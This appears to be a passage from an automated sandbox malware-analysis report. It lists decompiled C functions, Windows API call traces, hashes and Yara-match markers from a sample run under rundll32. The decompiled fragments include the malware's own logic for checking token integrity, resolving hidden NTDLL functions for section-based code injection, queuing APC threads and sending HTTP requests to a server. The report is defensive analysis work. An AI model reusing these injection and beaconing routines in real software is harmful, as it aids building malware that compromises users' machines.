                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                                                          • String ID:
                                                          • API String ID: 186216982-0
                                                          • Opcode ID: ace7dff4aac99154d48a423fa602e089378974a625ab59664adc5b1aaea010d1
                                                          • Instruction ID: b89e5d46dca7d16d3f378a7fabd1a431656c1044ca17daaea2035c07699dd930
                                                          • Opcode Fuzzy Hash: ace7dff4aac99154d48a423fa602e089378974a625ab59664adc5b1aaea010d1
                                                          • Instruction Fuzzy Hash: 0F316DB6C00208AFDB11EFA5DC88EAEBFBCEB08344F154469EA05E7214DB319E55CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062712E7 Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 062773EB: memset.NTDLL ref: 062773F5
                                                          • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,0627E2A4,?,?,?,?,?,?,?,06279100,?), ref: 06271381
                                                          • SetEvent.KERNEL32(00000000,?,0627E2A4,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 0627138E
                                                          • Sleep.KERNEL32(00000BB8,?,0627E2A4,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06271399
                                                          • ResetEvent.KERNEL32(00000000,?,0627E2A4,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062713A0
                                                          • CloseHandle.KERNEL32(00000000,?,0627E2A4,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062713A7
                                                          • GetShellWindow.USER32 ref: 062713B2
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 062713B9
                                                            • Part of subcall function 0628B1DC: RegCloseKey.ADVAPI32(0627E2A4), ref: 0628B25F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                                          • String ID:
                                                          • API String ID: 53838381-0
                                                          • Opcode ID: 0b818f8ac6b233a421530ec61f1d970d249f56df5e558cf91e911d44356c8c32
                                                          • Instruction ID: 693fe545881ad084cf585ef7b6990eac19ab7867a633e9d7e32814d2ead19678
                                                          • Opcode Fuzzy Hash: 0b818f8ac6b233a421530ec61f1d970d249f56df5e558cf91e911d44356c8c32
                                                          • Instruction Fuzzy Hash: 6C216032A11311BFC3916A67BC8CEAF776AAFCA610B188005FA1997640DB759411CFB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D6C41 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D6C41(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x36da2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E036D6D63(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E036D6C2C(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                          0x036d6c4e
                                                          0x036d6c55
                                                          0x036d6c5c
                                                          0x036d6c70
                                                          0x036d6c7b
                                                          0x036d6c93
                                                          0x036d6ca0
                                                          0x036d6ca3
                                                          0x036d6ca8
                                                          0x036d6cb3
                                                          0x036d6cb7
                                                          0x036d6cc6
                                                          0x036d6cca
                                                          0x036d6ce6
                                                          0x036d6ce6
                                                          0x036d6cea
                                                          0x036d6cea
                                                          0x036d6cef
                                                          0x036d6cf3
                                                          0x036d6cf9
                                                          0x036d6cfa
                                                          0x036d6d01
                                                          0x036d6d07

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 036D6C73
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 036D6C93
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 036D6CA3
                                                          • CloseHandle.KERNEL32(00000000), ref: 036D6CF3
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 036D6CC6
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 036D6CCE
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 036D6CDE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: 716d818a226a14fc3dc5fb34a40dfd719117dfe5978eef777db300387a4c4aef
                                                          • Instruction ID: dedefd00ec2c005a0723eb0e86fcb42caf8f4166f8fde1aaeeabf32de90a1c13
                                                          • Opcode Fuzzy Hash: 716d818a226a14fc3dc5fb34a40dfd719117dfe5978eef777db300387a4c4aef
                                                          • Instruction Fuzzy Hash: 24213975D00209FFEB10EF94DD84EEEBBB9EB49304F0400A9E910A6265D7719A54DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D1D33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 64%
                                                          			E036D1D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x36da348; // 0x228d5a8
				_t1 = _t9 + 0x36db624; // 0x253d7325
				_t36 = 0;
				_t28 = E036D624E(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x59695b1
					_t40 = E036D6D63(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E036D24B3(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E036D6C2C(_t40);
						_t42 = E036D5A07(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E036D6C2C(_t36);
							_t36 = _t42;
						}
						_t43 = E036D4162(_t36, _t33);
						if(_t43 != 0) {
							E036D6C2C(_t36);
							_t36 = _t43;
						}
					}
					E036D6C2C(_t28);
				}
				return _t36;
			}
















                                                          0x036d1d33
                                                          0x036d1d36
                                                          0x036d1d37
                                                          0x036d1d3e
                                                          0x036d1d45
                                                          0x036d1d4c
                                                          0x036d1d50
                                                          0x036d1d57
                                                          0x036d1d5e
                                                          0x036d1d63
                                                          0x036d1d6b
                                                          0x036d1d75
                                                          0x036d1d79
                                                          0x036d1d7d
                                                          0x036d1d83
                                                          0x036d1d88
                                                          0x036d1d92
                                                          0x036d1d98
                                                          0x036d1d9a
                                                          0x036d1db1
                                                          0x036d1db5
                                                          0x036d1db8
                                                          0x036d1dbd
                                                          0x036d1dbd
                                                          0x036d1dc6
                                                          0x036d1dca
                                                          0x036d1dcd
                                                          0x036d1dd2
                                                          0x036d1dd2
                                                          0x036d1dca
                                                          0x036d1dd5
                                                          0x036d1dda
                                                          0x036d1de0

                                                          APIs
                                                            • Part of subcall function 036D624E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,036D1D4C,253D7325,00000000,00000000,?,75BCC740,036D58D7), ref: 036D62B5
                                                            • Part of subcall function 036D624E: sprintf.NTDLL ref: 036D62D6
                                                          • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D1D5E
                                                          • lstrlen.KERNEL32(00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D1D66
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • strcpy.NTDLL ref: 036D1D7D
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 036D1D88
                                                            • Part of subcall function 036D24B3: lstrlen.KERNEL32(00000000,00000000,036D58D7,00000000,?,036D1D97,00000000,036D58D7,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D24C4
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,036D58D7,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D1DA5
                                                            • Part of subcall function 036D5A07: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,036D1DB1,00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D5A11
                                                            • Part of subcall function 036D5A07: _snprintf.NTDLL ref: 036D5A6F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 7bc1dec81c79a209aebb206534dbfe39cc39ab27e0aa0f1bfef829573337c169
                                                          • Instruction ID: e2c9c52a42616d1a45cd2f1a52a9d4922bf6a1714aa69f298f2616a4c7e9aafa
                                                          • Opcode Fuzzy Hash: 7bc1dec81c79a209aebb206534dbfe39cc39ab27e0aa0f1bfef829573337c169
                                                          • Instruction Fuzzy Hash: 9411C637D01324674762F7B5EC84CAF7AAD9E8A5543091019F900DB208CFB5DD0287A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D3F07 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 036D1F7A: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,059689D0,036D3F35,?,?,?,?,?,?,?,?,?,?,?,036D3F35), ref: 036D2047
                                                            • Part of subcall function 036D5634: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 036D5671
                                                            • Part of subcall function 036D5634: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 036D56A2
                                                          • SysAllocString.OLEAUT32(00000000), ref: 036D3F61
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 036D3F75
                                                          • SysAllocString.OLEAUT32(00000000), ref: 036D3F87
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D3FEF
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D3FFE
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D4009
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                                          • String ID:
                                                          • API String ID: 2831207796-0
                                                          • Opcode ID: e9ada136c865149cbed007e41851e3d297daed36b5ce5d4d763d9c635d092874
                                                          • Instruction ID: 4431c9c158142f8b20a28f9d241367da65ecdf1884be5fd13d85b1bf9904cbfa
                                                          • Opcode Fuzzy Hash: e9ada136c865149cbed007e41851e3d297daed36b5ce5d4d763d9c635d092874
                                                          • Instruction Fuzzy Hash: FF416F36D00609AFDB01EFB9D844AAEB7B9EF89311F14442AED14EB260DB719D05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06285800 Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,80000000,00000001,?,062960C0,00000018,06274B2B,?,00000201,06299A24,062999DC,-0000000C,?), ref: 06285843
                                                          • VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,?,?,?,80000000,00000001,?,062960C0,00000018,06274B2B), ref: 062858CE
                                                          • RtlEnterCriticalSection.NTDLL(0629A400), ref: 062858F7
                                                          • RtlLeaveCriticalSection.NTDLL(0629A400), ref: 06285915
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                          • String ID:
                                                          • API String ID: 3666628472-0
                                                          • Opcode ID: 1c9d75ce35b991d8b726e546528f04e9f4134d6eb13d914d766492b0d4b8f815
                                                          • Instruction ID: df51ce80a795758f21bafd4cdd88d86545be129597fd88e643fcd43af8f96a3d
                                                          • Opcode Fuzzy Hash: 1c9d75ce35b991d8b726e546528f04e9f4134d6eb13d914d766492b0d4b8f815
                                                          • Instruction Fuzzy Hash: 0D415CB0A21706EFDB91EF65CC84A9DBBF9FF48310B10811AE925E7250D7749A51CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D44DE Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D44DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E036D6D63(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x36da348; // 0x228d5a8
					_t1 = _t23 + 0x36db11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x36da348; // 0x228d5a8
					_t2 = _t26 + 0x36db761; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E036D6C2C(_t54);
					} else {
						_t30 =  *0x36da348; // 0x228d5a8
						_t5 = _t30 + 0x36db74e; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x36da348; // 0x228d5a8
							_t7 = _t33 + 0x36db771; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x36da348; // 0x228d5a8
								_t9 = _t36 + 0x36db4ca; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x36da348; // 0x228d5a8
									_t11 = _t39 + 0x36db786; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E036D190C(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                          0x036d44ed
                                                          0x036d44f1
                                                          0x036d45b3
                                                          0x036d44f7
                                                          0x036d44f7
                                                          0x036d44fc
                                                          0x036d450f
                                                          0x036d4511
                                                          0x036d4516
                                                          0x036d451e
                                                          0x036d4525
                                                          0x036d4527
                                                          0x036d452c
                                                          0x036d45ab
                                                          0x036d45ac
                                                          0x036d452e
                                                          0x036d452e
                                                          0x036d4533
                                                          0x036d453b
                                                          0x036d453d
                                                          0x036d4542
                                                          0x00000000
                                                          0x036d4544
                                                          0x036d4544
                                                          0x036d4549
                                                          0x036d4551
                                                          0x036d4553
                                                          0x036d4558
                                                          0x00000000
                                                          0x036d455a
                                                          0x036d455a
                                                          0x036d455f
                                                          0x036d4567
                                                          0x036d4569
                                                          0x036d456e
                                                          0x00000000
                                                          0x036d4570
                                                          0x036d4570
                                                          0x036d4575
                                                          0x036d457d
                                                          0x036d457f
                                                          0x036d4584
                                                          0x00000000
                                                          0x036d4586
                                                          0x036d458c
                                                          0x036d4591
                                                          0x036d4598
                                                          0x036d459d
                                                          0x036d45a2
                                                          0x00000000
                                                          0x036d45a4
                                                          0x036d45a7
                                                          0x036d45a7
                                                          0x036d45a2
                                                          0x036d4584
                                                          0x036d456e
                                                          0x036d4558
                                                          0x036d4542
                                                          0x036d452c
                                                          0x036d45c1

                                                          APIs
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,036D4046,?,?,?,?,00000000,00000000), ref: 036D4503
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 036D4525
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 036D453B
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 036D4551
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 036D4567
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 036D457D
                                                            • Part of subcall function 036D190C: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,036D459D), ref: 036D1969
                                                            • Part of subcall function 036D190C: memset.NTDLL ref: 036D198B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                          • String ID:
                                                          • API String ID: 3012371009-0
                                                          • Opcode ID: 481bb4f6bafac1419a66009bc5594e7b8a10d2918cf61b517af7df1ce13b9ae7
                                                          • Instruction ID: 64df30c3262ef8ac12426012bdd7b6eabafb1d533d35f9cd1e27079941064f51
                                                          • Opcode Fuzzy Hash: 481bb4f6bafac1419a66009bc5594e7b8a10d2918cf61b517af7df1ce13b9ae7
                                                          • Instruction Fuzzy Hash: F5215371D1170A9FDB51DF6AD984E5ABBFCEF44600B064415E905C7354DF70ED058BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06288F62 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,0627C71A,0627C71A,?,06286EFA,?,0627C71A,?,?,00000000), ref: 06288F87
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06288FA9
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06288FBF
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06288FD5
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06288FEB
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06289001
                                                            • Part of subcall function 0627710A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 06277167
                                                            • Part of subcall function 0627710A: memset.NTDLL ref: 0627718B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                          • String ID:
                                                          • API String ID: 3012371009-0
                                                          • Opcode ID: 023725328bae66ad68ac70fd06578c9565db9d94b1ec32861d98120dcec5118e
                                                          • Instruction ID: 214ce995dcc693ff14f15afcdeab48da792881e198fa3d4e310eb7c1770bccb7
                                                          • Opcode Fuzzy Hash: 023725328bae66ad68ac70fd06578c9565db9d94b1ec32861d98120dcec5118e
                                                          • Instruction Fuzzy Hash: 2E2168B0A1170AAFD751EFADEC48D6AB7ECEF45244B044426EA04CB241E774E940CF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D6954 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D6954(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0) {
					_t9 = E036D45C4(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
					if(_t9 == 0) {
						L9:
						return GetLastError();
					}
				}
				_t10 = E036D7AF1(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                          0x036d6954
                                                          0x036d6961
                                                          0x036d6963
                                                          0x036d696e
                                                          0x036d6975
                                                          0x036d69c6
                                                          0x00000000
                                                          0x036d69c6
                                                          0x036d6975
                                                          0x036d697b
                                                          0x036d6982
                                                          0x036d698e
                                                          0x036d6993
                                                          0x036d69a9
                                                          0x036d69b9
                                                          0x00000000
                                                          0x036d69ab
                                                          0x036d69ab
                                                          0x036d69b2
                                                          0x036d69bf
                                                          0x036d69bf
                                                          0x036d69bf
                                                          0x036d69b2
                                                          0x036d69a9
                                                          0x036d69c4
                                                          0x00000000
                                                          0x00000000
                                                          0x036d69ca

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,036D37A0,?,?,76CC81D0,00000000), ref: 036D698E
                                                          • ResetEvent.KERNEL32(?), ref: 036D6993
                                                          • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 036D69A0
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?,?), ref: 036D69AB
                                                          • GetLastError.KERNEL32(?,?,00000102,036D37A0,?,?,76CC81D0,00000000), ref: 036D69C6
                                                            • Part of subcall function 036D45C4: lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,036D6973,?,?,?,?,00000102,036D37A0,?,?,76CC81D0), ref: 036D45D0
                                                            • Part of subcall function 036D45C4: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,036D6973,?,?,?,?,00000102,036D37A0,?), ref: 036D462E
                                                            • Part of subcall function 036D45C4: lstrcpy.KERNEL32(00000000,00000000), ref: 036D463E
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?), ref: 036D69B9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3739416942-0
                                                          • Opcode ID: 73b994bf7102fd2c8bf7845fd0c7c44a9071d47c20d7d5f701043319074cb9ac
                                                          • Instruction ID: e37601ccc7d39a9a49207d289533e470693e78722239533179e4fe3d2006eca8
                                                          • Opcode Fuzzy Hash: 73b994bf7102fd2c8bf7845fd0c7c44a9071d47c20d7d5f701043319074cb9ac
                                                          • Instruction Fuzzy Hash: C901A231904202AADB30AB75EE44F1BFBA8AF44364F550628F553D51E8CB20D414D614
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062873AA Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,00000000,0628893A,0629A174,06290998), ref: 062873C1
                                                          • QueueUserAPC.KERNEL32(0628893A,00000000,?,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873D6
                                                          • GetLastError.KERNEL32(00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873E1
                                                          • TerminateThread.KERNEL32(00000000,00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873EB
                                                          • CloseHandle.KERNEL32(00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873F2
                                                          • SetLastError.KERNEL32(00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873FB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                          • String ID:
                                                          • API String ID: 3832013932-0
                                                          • Opcode ID: b2d1d6079016bb8b044a3c5268bc91b1c91cf2abebc5de807e8e26128245be02
